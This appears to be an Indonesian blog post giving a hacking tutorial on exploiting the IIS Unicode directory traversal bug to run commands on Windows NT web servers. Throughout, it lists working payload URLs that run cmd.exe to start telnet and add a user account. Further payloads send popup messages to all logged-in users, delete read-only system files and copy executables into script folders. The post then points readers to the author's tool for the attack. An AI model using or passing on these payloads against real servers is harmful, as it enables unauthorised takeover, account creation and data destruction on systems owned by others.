Eksploitasi Unicode
Dengan Telnet
Bagi rekan - rekan
yang merasa "repot" menggunakan unicode bug karena setiap command
harus menggunakan kode - kode yang panjang, saya kebetulan menemukan cara,
yaitu dengan langsung TELnet ke server bersangkutan.
Langkah-langkahnya:
1. gunakan kode
unicode yang bekerja (cmd.exe), misalnya :
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe
2. sebelum dapat
telnet ke server bersangkutan, service telnet harus dinyalakan
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+
net+start +telnet
3. telnet dengan
telnet client ke server bersangkutan
4. bila diminta
password, maka anda perlu menggunakan prosedur add user
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c
+net+ user+ add+<username>+<password>+/add
5. gunakan program
getadmin (bila dimungkinkan)
6. coba telnet in
lagi, gunakan username dan password yang baru dibuat 7. bila beruntung, anda
akan dapat bermain - main dengan command seperti jika anda menggunakan command
line interface CMD.exe biasa (seperti DOS)
2--- Mengagetkan
pemilik/administrator server dengan kotak message ---
Perintah ini dapat
mengirim pesan / memunculkan kotak pemberitahuan (Messenger Service / Winpopup)
pada layar administrator atau bahkan semua user yang login ke server bersangkutan.
(menggunakan perintah NET SEND)
Langkah - langkah :
1. Gunakan kode
unicode yang bekerja, misalnya :
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe
2. Masukkan perintah
NET send :
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+
net+ send+*+<message>
Tanda * berarti
mengirim message ke semua user, dapat diganti dengan username tertentu,
misalnya "administrator". <Message> adalah pesan yang ingin
anda munculkan, boleh menggunakan karakter spasi (bila dikirim ke server
otomatis diubah menjadi %20 oleh browser
3--- Mendelete
file/folder yang read-only ---
Untuk ini gunakan
perintah DEL dengan parameter /R
misalnya :
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+
del+/R+c:\autoexec.bat
4--- Melihat
konfigurasi network server NT ---
Anda dapat
menggunakan perintah IPCONFIG untuk melihat konfigurasi network,
langkah-langkahnya :
1. Gunakan kode
unicode yang bekerja, misalnya :
http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe
2. Jalankan program
"ipconfig"
http://www.domain.com/scripts/..%c0%af../winnt/system32/ipconfig.exe
Bila tidak dapat
dijalankan, anda dapat menggunakan kode cmd.exe yang bekerja untuk memindahkan
/ mengcopy ipconfig.exe ke folder yang executable (misalnya /wwwroot/scripts
atau /inetpub/scripts) Setelah itu jalankan perintah tersebut, tanpa
menggunakan cmd.exe (langsung)
--- Penutup ---
Demikian beberapa
trik dari saya, semoga bermanfaat bagi rekan - rekan sekalian. Bila ada yang
sudah pernah di-posting sebelumnya mohon maaf. Untuk keperluan mengeksploit
unicode bug ini anda dapat menggunakan program buatan saya (bila browser dirasa
terlalu rumit), bernama Madcodes RawHTTP, dapat di download dari
http://channels.dal.net/madcodes/mdrhttp.exe (terakhir versi 1.40)
0 komentar:
Posting Komentar